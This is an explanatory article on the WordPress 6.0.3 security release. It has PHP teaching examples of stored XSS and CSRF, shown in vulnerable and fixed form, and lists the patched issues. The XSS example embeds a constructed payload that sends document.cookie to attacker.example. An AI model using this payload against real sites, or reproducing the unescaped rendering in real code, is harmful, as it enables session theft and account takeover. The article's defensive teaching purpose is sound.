WordPress has released security update 6.0.3, which fixes sixteen vulnerabilities found in earlier versions of the software. Because the fixes were also backported, every branch since WordPress 3.7 has received a corresponding security release.
Risk of Cross-Site Scripting (XSS)
The US government’s National Vulnerability Database (NVD) has published advisories for several of these WordPress vulnerabilities.
Cross-Site Scripting, commonly abbreviated XSS, is one of several vulnerability classes addressed in this release.
A web application such as WordPress typically becomes vulnerable to XSS when it fails to properly sanitize user-supplied input (text typed into a form, or a filename submitted through an upload field, for example) or fails to escape that data when it is later written into a page.
An attacker can then inject a script that runs in the browser of anyone who views the affected page, giving the attacker access to that visitor’s session cookies and other sensitive data.
Several of the fixes address Stored XSS, which is generally regarded as more serious than a reflected XSS attack.
In a stored XSS attack the malicious script is saved on the site itself (in a comment, a widget setting or a post, for instance), so it executes for every visitor who loads the affected page, including logged-in administrators, without the attacker having to lure each victim with a crafted link.
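The following is an added example written for this article; it is not WordPress core code and not part of any of the patched components. It shows the mechanism behind a stored XSS bug: a comment saved without sanitization is later echoed into a page without escaping, so it runs for every reader. The attacker payload is constructed, and the minimal esc_html()/esc_attr() definitions are only stand-ins so the file runs outside WordPress (inside WordPress the real functions exist and the fallbacks are skipped).

```php
<?php
declare(strict_types=1);
// Added example (not WordPress core): a stored-XSS sink and its escaped form.
// Scenario: a plugin stores a visitor's comment and later renders it for every
// reader of the post, including a logged-in administrator.

// Stand-ins for WordPress' escaping helpers, defined only when WordPress is not
// loaded (assumption: pages are UTF-8). They are not WordPress' implementation.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

// Constructed attacker payload, as it would sit in the database after the
// "sanitize on input" step was skipped. The author field breaks out of an
// HTML attribute; the content field injects a script element.
$stored_comment = [
    'author'  => 'mallory" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)',
    'content' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>Nice post!',
];

// VULNERABLE: database content is trusted and echoed verbatim. Every viewer
// executes the stored script and an administrator's cookies leak.
function render_comment_vulnerable(array $c): string {
    return '<li class="comment" data-author="' . $c['author'] . '">'
         . $c['content']
         . '</li>';
}

// FIXED: escape for the exact output context. Text nodes get esc_html(),
// attribute values get esc_attr(). The stored data is unchanged; the browser
// now receives inert text instead of markup.
function render_comment_escaped(array $c): string {
    return '<li class="comment" data-author="' . esc_attr($c['author']) . '">'
         . esc_html($c['content'])
         . '</li>';
}

// Reviewer check: the hardened output must contain neither a raw script tag
// nor a quote that closes the data-author attribute early.
function output_is_inert(string $html): bool {
    return stripos($html, '<script') === false
        && strpos($html, '" onmouseover') === false;
}

echo "--- vulnerable ---\n", render_comment_vulnerable($stored_comment), "\n\n";
$safe = render_comment_escaped($stored_comment);
echo "--- escaped ---\n", $safe, "\n";
echo 'vulnerable output inert: ', output_is_inert(render_comment_vulnerable($stored_comment)) ? 'yes' : 'no', "\n";
echo 'escaped output inert:    ', output_is_inert($safe) ? 'yes' : 'no', "\n";
```

Run it with `php stored_xss.php`. The point of the example is that the fix lives at the output sink, not only at the input form: the same stored record is rendered safely once each value is escaped for its context. Where a site must allow some HTML in comments, WordPress offers wp_kses_post() for allow-list filtering, which is a different trade-off from the plain escaping shown here.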
Cross-Site Request Forgery (CSRF)
A second class of vulnerability fixed in this release is Cross-Site Request Forgery, which the nonprofit Open Web Application Security Project (OWASP) describes on its website as follows:
“Cross-Site Request Forgery (CSRF) is an attack that compels a user who is currently logged in to a web application to perform undesirable actions.
An attacker can employ a little social engineering to persuade users of a web application to carry out the attacker’s desired actions (for example, by delivering a link via email or chat).
If the victim is a regular user, a successful CSRF attack can compel them to carry out state-changing operations such as money transfers, email address changes, and other such tasks.
If the victim is an administrative account, CSRF can compromise the entire web application.”
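The following is an added example written for this article, not WordPress core code and not the code of the patched wp-trackback.php. It simulates, in one process, why a logged-in victim’s browser can be made to submit a state-changing request and how a per-session secret token (a “nonce” in WordPress terminology) stops it. The $session array stands in for the victim’s server-side session, $post for the request body their browser sends along with their cookies; both, and the attacker’s forged request, are constructed.

```php
<?php
declare(strict_types=1);
// Added example (not WordPress core): a "change email" endpoint without and
// with CSRF protection. In WordPress the equivalent pair is wp_nonce_field()
// in the form and check_admin_referer() in the handler.

// UNPROTECTED handler: any request that arrives with the victim's session
// cookie is trusted. A hidden, auto-submitting form on attacker.example
// therefore changes the victim's address without their knowledge.
function change_email_vulnerable(array &$session, array $post): string {
    if (empty($session['user'])) {
        return 'rejected: not logged in';
    }
    $session['email'] = (string) ($post['email'] ?? '');
    return 'ok: email changed';
}

// Token issuance: a random secret stored in the session and embedded in the
// legitimate form as a hidden field. A page on another origin cannot read it
// (same-origin policy), so a forged request cannot supply the right value.
function issue_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// PROTECTED handler: the submitted token must match the session token,
// compared in constant time so timing does not leak the secret.
function change_email_protected(array &$session, array $post): string {
    if (empty($session['user'])) {
        return 'rejected: not logged in';
    }
    $expected  = (string) ($session['csrf_token'] ?? '');
    $submitted = (string) ($post['_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $submitted)) {
        return 'rejected: bad or missing CSRF token';
    }
    $session['email'] = (string) ($post['email'] ?? '');
    return 'ok: email changed';
}

// --- Constructed scenario ---------------------------------------------------
$session = ['user' => 'admin', 'email' => 'admin@site.example'];

// 1. The site renders its own form, carrying the token in a hidden field.
$token = issue_csrf_token($session);
$legit_form = '<form method="post" action="/profile/email">'
    . '<input type="hidden" name="_token" value="' . htmlspecialchars($token, ENT_QUOTES) . '">'
    . '<input name="email"><button>Save</button></form>';
echo "legitimate form:\n", $legit_form, "\n\n";

// 2. The victim is lured to attacker.example, whose page submits this body to
//    /profile/email. The browser attaches the victim's cookies, so the session
//    is present, but the attacker has no way to learn $token.
$forged_post = ['email' => 'attacker@evil.example'];

echo 'unprotected handler, forged request: ', change_email_vulnerable($session, $forged_post), "\n";
echo '  email is now: ', $session['email'], "\n";
$session['email'] = 'admin@site.example'; // reset before the protected run

echo 'protected handler, forged request:   ', change_email_protected($session, $forged_post), "\n";
echo '  email is now: ', $session['email'], "\n";

// 3. The genuine form submission carries the token and is accepted.
$genuine_post = ['email' => 'new@site.example', '_token' => $token];
echo 'protected handler, genuine request:  ', change_email_protected($session, $genuine_post), "\n";
echo '  email is now: ', $session['email'], "\n";
```

Running it with `php csrf_demo.php` shows the forged request succeeding against the first handler and being rejected by the second, while the genuine submission still goes through. One caveat when mapping this onto WordPress: a WordPress nonce is not a random per-session value but a keyed hash of the action, the user and a time tick, valid for roughly 12 to 24 hours and reusable within that window. It still binds the request to a specific action and logged-in user, which is what defeats the cross-site form, but it is weaker than the single-secret design above, so the action string passed to wp_nonce_field() and check_admin_referer() should be specific to the operation being protected.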
The vulnerabilities fixed in 6.0.3 are as follows:
Stored XSS via wp-mail.php (post by email)
Open redirect in wp_nonce_ays
Sender’s email address is exposed in wp-mail.php
Media Library: Reflected XSS via SQLi
Cross-Site Request Forgery (CSRF) in wp-trackback.php
Stored XSS via the Customizer
Revert shared user instances introduced in changeset 50790
Stored XSS in WordPress Core via comment editing
Data exposure via the REST Terms/Tags endpoint
Content from multipart emails leaked
SQL Injection due to improper sanitization in WP_Date_Query
RSS Widget: Stored XSS issue
Stored XSS in the Search block
Featured Image block: XSS issue
RSS block: Stored XSS issue
Fix widget block XSS
Recommended Action
Because this is a security release, WordPress advised all site owners to update immediately; sites with automatic background updates enabled will already have received the fix for their branch.